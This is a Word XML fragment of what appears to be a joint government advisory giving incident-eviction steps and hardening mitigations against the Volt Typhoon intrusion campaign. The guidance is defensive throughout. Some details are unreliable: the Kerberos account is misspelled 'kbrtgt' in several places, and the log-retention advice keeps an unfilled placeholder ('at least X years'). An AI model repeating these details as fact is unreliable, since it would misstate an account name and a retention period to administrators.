        <w:t>Reset passwords for all domain users and all local accounts, such as Guest, HelpAssistant, DefaultAccount, System, Administrator, and kbrtgt. The kbrtgt account is responsible for handling Kerberos ticket requests as well as encrypting and signing them. The kbrtgt account should be reset twice because the account has a two-password history. The first account reset for the kbrtgt needs to be allowed to replicate prior to the second reset to avoid any issues. See CISA's Eviction Guidance for Networks Affected by the SolarWinds and Active Directory/M365 Compromise for more information. Although tailored to FCEB agencies compromised in the 2020 SolarWinds Orion supply chain compromise, the steps are applicable to organizations with Windows AD compromise.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Review access policies to temporarily revoke privileges/access for affected accounts/devices. If it is necessary to not alert the attacker (e.g., for intelligence purposes), then privileges can be reduced for affected accounts/devices to "contain" them.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Reset the relevant account credentials or access keys if the investigation finds the threat actor's access is limited to non-elevated permissions. Monitor related accounts, especially administrative accounts, for any further signs of unauthorized access.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Audit all network appliance and edge device configurations with indicators of malicious activity for signs of unauthorized or malicious configuration changes. Organizations should ensure they audit the current network device running configuration and any local configurations that could be loaded at boot time. If configuration changes are identified: Change all credentials being used to manage network devices, to include keys and strings used to secure network device functions (SNMP strings/user credentials, IPsec/IKE preshared keys, routing secrets, TACACS/RADIUS secrets, RSA keys/certificates, etc.).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Update all firmware and software to the latest version.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Report the compromise to an authoring agency (see the Contact Information section).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>For organizations with cloud or hybrid environments, apply best practices for identity and credential access management.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Verify that all accounts with privileged role assignments are cloud native, not synced from Active Directory.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Audit conditional access policies to ensure Global Administrators and other highly privileged service principals and accounts are not exempted. Audit privileged role assignments to ensure adherence to the principle of least privilege when assigning privileged roles.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Leverage just-in-time and just-enough access mechanisms when administrators need to elevate to a privileged role.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>In hybrid environments, ensure federated systems (such as AD FS) are configured and monitored properly.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Audit Enterprise Applications for recently added applications and examine the API permissions assigned to each.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Reconnect to the internet. Note: The decision to reconnect to the internet depends on senior leadership's confidence in the actions taken. It is possible-depending on the environment-that new information discovered during pre-eviction and eviction steps could add additional eviction tasks. Minimize and control use of remote access tools and protocols by applying best practices from joint Guide to Securing Remote Access Software and joint Cybersecurity Information Sheet: Keeping PowerShell: Security Measures to Use and Embrace.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Consider sharing technical information with an authoring agency and/or a sector-specific information sharing and analysis center.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more information on incident response and remediation, see: Joint advisory Technical Approaches to Uncovering and Remediating Malicious Activity. This advisory provides incident response best practices.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">CISA's Federal Government Cybersecurity Incident and Vulnerability Response Playbooks. Although tailored to U.S. Federal Civilian Executive Branch (FCEB) agencies, the playbooks are applicable to all organizations. The incident </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>response playbook provides procedures to identify, coordinate, remediate, recover, and track successful mitigations from incidents. Joint Water and Wastewater Sector - Incident Response Guide. This joint guide provides incident response best practices and information on federal resources for Water and Wastewater Systems Sector organizations. MITIGATIONS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These mitigations are intended for IT administrators in critical infrastructure organizations. The authoring agencies recommend that software manufactures incorporate secure by design and default principles and tactics into their software development practices to strengthen the security posture for their customers.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information on secure by design practices that may protect customers against common Volt Typhoon techniques, see joint guide Identifying and Mitigating Living off the Land Techniques and joint Secure by Design Alert Security Design Improvements for SOHO Device Manufacturers.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more information on secure by design, see CISA's Secure by Design webpage and joint guide.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authoring agencies recommend organizations implement the mitigations below to improve your organization's cybersecurity posture on the basis of Volt Typhoon activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA's Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections. IT Network Administrators and Defenders Harden the Attack Surface Apply patches for internet-facing systems within a risk-informed span of time [CPG 1E]. Prioritize patching critical assets, known exploited vulnerabilities, and vulnerabilities in appliances known to be frequently exploited by Volt Typhoon (e.g., Fortinet, Ivanti, NETGEAR, Citrix, and Cisco devices).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Apply vendor-provided or industry standard hardening guidance to strengthen software and system configurations. Note: As part of CISA's Secure by Design campaign, CISA urges software manufacturers to prioritize secure by default configurations to eliminate the need for customer implementation of hardening guidelines.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Maintain and regularly update an inventory of all organizational IT assets [CPG 1A].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Use third party assessments to validate current system and network security compliance via security architecture reviews, penetration tests, bug bounties, attack surface management services, incident simulations, or table-top exercises (both announced and unannounced) [CPG 1F].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Limit internet exposure of systems when not necessary. An organization's primary attack surface is the combination of the exposure of all its internet-facing systems. Decrease the attack surface by not exposing systems or management interfaces to the internet when not necessary. Secure Credentials Do not store credentials on edge appliances/devices. Ensure edge devices do not contain accounts that could provide domain admin access.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Do not store plaintext credentials on any system [CPG 2L]. Credentials should be stored securely-such as with a credential/password manager or vault, or other privileged account management solutions-so they can only be accessed by authenticated and authorized users.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Change default passwords [CPG 2A] and ensure they meet the policy requirements for complexity.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement and enforce an organizational system-enforced policy that: Requires passwords for all IT password-protected assets to be at least 15 characters; Does not allow users to reuse passwords for accounts, applications, services, etc., [CPG 2C]; and Does not allow service accounts/machine accounts to reuse passwords from member user accounts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Configure Group Policy settings to prevent web browsers from saving passwords and disable autofill functions.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Disable the storage of clear text passwords in LSASS memory. Secure Accounts Implement phishing-resistant MFA for access to assets [CPG 2H].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Separate user and privileged accounts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>User accounts should never have administrator or super-user privileges [CPG 2E]. Administrators should never use administrator accounts for actions and activities not associated with the administrator role (e.g., checking email, web browsing).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Enforce the principle of least privilege.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Ensure administrator accounts only have the minimum permissions necessary to complete their tasks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Review account permissions for default/accounts for edge appliances/devices and remove domain administrator privileges, if identified.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Significantly limit the number of users with elevated privileges. Implement continuous monitoring for changes in group membership, especially in privileged groups, to detect and respond to unauthorized modifications. Remove accounts from high-privilege groups like Enterprise Admins and Schema Admins. Temporarily reinstate these privileges only when necessary and under strict auditing to reduce the risk of privilege abuse.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Transition to Group Managed Service Accounts (gMSAs) where suitable for enhanced management and security of service account credentials. gMSAs provide automated password management and simplified Service Principal Name (SPN) management, enhancing security over traditional service accounts. See Microsoft's Group Managed Service Accounts Overview.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Enforce strict policies via Group Policy and User Rights Assignments to limit high-privilege service accounts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Consider using a privileged access management (PAM) solution to manage access to privileged accounts and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>resources [CPG 2L]. PAM solutions can also log and alert usage to detect any unusual activity.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Complement the PAM solution with role-based access control (RBAC) for tailored access based on job requirements. This ensures that elevated access is granted only when required and for a limited duration, minimizing the window of opportunity for abuse or exploitation of privileged credentials.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement an Active Directory tiering model to segregate administrative accounts based on their access level and associated risk. This approach reduces the potential impact of a compromised account. See Microsoft's PAM environment tier model.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Harden administrative workstations to only permit administrative activities from workstations appropriately hardened based on the administrative tier. See Microsoft's Why are privileged access devices important - Privileged access.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Disable all user accounts and access to organizational resources of employees on the day of their departure [CPG 2G] Regularly audit all user, admin, and service accounts and remove or disable unused or unneeded accounts as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>applicable.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Regularly roll NTLM hashes of accounts that support token-based authentication.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Improve management of hybrid (cloud and on-premises) identity federation by: Using cloud only administrators that are asynchronous with on-premises environments and ensuring on-premises administrators are asynchronous to the cloud.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Using CISA's SCuBAGear tool to discover cloud misconfigurations in Microsoft cloud tenants. SCuBA gear is automation script for comparing Federal Civilian Executive Branch (FCEB) agency tenant configurations against CISA M365 baseline recommendations. SCuBAGear is part of CISA's Secure Cloud Business Applications (SCuBA) project, which provides guidance for FCEB agencies, securing their cloud business application environments and protecting federal information created, accessed, shared, and stored in those environments. Although tailored to FCEB agencies, the project provides security guidance applicable to all organizations with cloud environments. For more information on SCuBAGear see CISA's Secure Cloud Business Applications (SCuBA) Project.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Using endpoint detection and response capabilities to actively defend on- premises federation servers. Secure Remote Access Services Limit the use of RDP and other remote desktop services. If RDP is necessary, apply best practices, including auditing the network for systems using RDP, closing unused RDP ports, and logging RDP login attempts. Disable Server Message Block (SMB) protocol version 1 and upgrade to version 3 (SMBv3) after mitigating existing dependencies (on existing systems or applications), as they may break when disabled.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Harden SMBv3 by implementing guidance included in joint #StopRansomware Guide (see page 8 of the guide).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Apply mitigations from the joint Guide to Securing Remote Access Software. Secure Sensitive Data Securely store sensitive data (including operational technology documentation, network diagrams, etc.), ensuring that only authenticated and authorized users can access the data. Implement Network Segmentation Ensure that sensitive accounts use their administrator credentials only on hardened, secure computers. This practice can reduce lateral movement exposure within networks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Conduct comprehensive trust assessments to identify business-critical trusts and apply necessary controls to prevent unauthorized cross- forest/domain traversal.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Harden federated authentication by enabling Secure Identifier (SID) Filtering and Selective Authentication on AD trust relationships to further restrict unauthorized access across domain boundaries.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement network segmentation to isolate federation servers from other systems and limit allowed traffic to systems and protocols that require access in accordance with Zero Trust principles. Secure Cloud Assets Harden cloud assets in accordance with vendor-provided or industry standard hardening guidance.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Organizations with Microsoft cloud infrastructure, see CISA's Microsoft 365 Security Configuration Baseline Guides, which provide minimum viable secure configuration baselines for Microsoft Defender for Office 365, Azure Active Directory (now known as Microsoft Entra ID), Exchange Online, OneDrive for Business, Power BI, Power Platform, SharePoint Online, and Teams. For additional guidance, see the Australian Signals Directorate's Blueprint for Secure Cloud.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Organizations with Google cloud infrastructure, see CISA's Google Workspace Security Configuration Baseline Guides, which provide minimum viable secure configuration baselines for Groups for Business, GMAIL, Google Calendar, Google Chat, Google Common Controls, Google Classroom, Google Drive and Docs, Google Meet, and Google Sites.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Revoke unnecessary public access to cloud environment. This involves reviewing and restricting public endpoints and ensuring that services like storage accounts, databases, and virtual machines are not publicly accessible unless absolutely necessary. Disable legacy authentication protocols across all cloud services and platforms. Legacy protocols frequently lack support for advanced security mechanisms such as multifactor authentication, rendering them susceptible to compromises. Instead, enforce the use of modern authentication protocols that support stronger security features like MFA, token-based authentication, and adaptive authentication measures.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Enforce this practice through the use of Conditional Access Policies. These policies can initially be run in report-only mode to identify potential impacts and plan mitigations before fully enforcing them. This approach allows organizations to systematically control access to their cloud resources, significantly reducing the risk of unauthorized access and potential compromise.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Regularly monitor and audit privileged cloud-based accounts, including service accounts, which are frequently abused to enable broad cloud resource access and persistence. Be Prepared Ensure logging is turned on for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>application, access, and security logs (e.g., intrusion detection systems/intrusion prevention systems, firewall, data loss prevention, and VPNs) [CPG 2T]. Given Volt Typhoon's use of LOTL techniques and their significant dwell time, application event logs may be a valuable resource to hunt for Volt Typhoon activity because these logs typically remain on endpoints for relatively long periods of time.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>For OT assets where logs are non-standard or not available, collect network traffic and communications between those assets and other assets.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement file integrity monitoring (FIM) tools to detect unauthorized changes.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Store logs in a central system, such as a security information and event management (SIEM) tool or central database.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Ensure the logs can only be accessed or modified by authorized and authenticated users [CPG 2U].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Store logs for a period informed by risk or pertinent regulatory guidelines. (CISA recommends storing logs for at least X years, given Volt Typhoon's long dwell time.) Tune log alerting to reduce noise while ensuring there are alerts for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>high- risk activities. (For information on alert tuning, see joint guide Identifying and Mitigating Living Off the Land Techniques.) Establish and continuously maintain a baseline of installed tools and software, account behavior, and network traffic. This way, network defenders can identify potential outliers, which may indicate malicious activity. Note: For information on establishing a baseline, see joint guide Identifying and Mitigating Living off the Land Techniques.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Document a list of threats and cyber actor TTPs relevant to your organization (e.g., based on industry or sectors), and maintain the ability (such as via rules, alerting, or commercial prevention and detection systems) to detect instances of those key threats [CPG 3A].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement periodic training for all employees and contractors that covers basic security concepts (such as phishing, business email compromise, basic operational security, password security, etc.), as well as fostering an internal culture of security and cyber awareness [CPG 2I].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Tailor the training to network IT personnel/administrators and other key staff based on relevant organizational cyber threats and TTPs, such as Volt Typhoon. For example, communicate that Volt Typhoon actors are known to target personal email accounts of IT staff, and encourage staff to protect their personal email accounts by using strong passwords and implementing MFA. In addition to basic cybersecurity training, ensure personnel who maintain or secure OT as part of their regular duties receive OT-specific cybersecurity training on at least an annual basis [CPG 2J].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Educate users about the risks associated with storing unprotected passwords. OT Administrators and Defenders Change default passwords [CPG 2A] and ensure they meet the policy requirements for complexity. If the asset's password cannot be changed, implement compensating controls for the device; for example, segment the device into separate enclaves and implement increased monitoring and logging.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
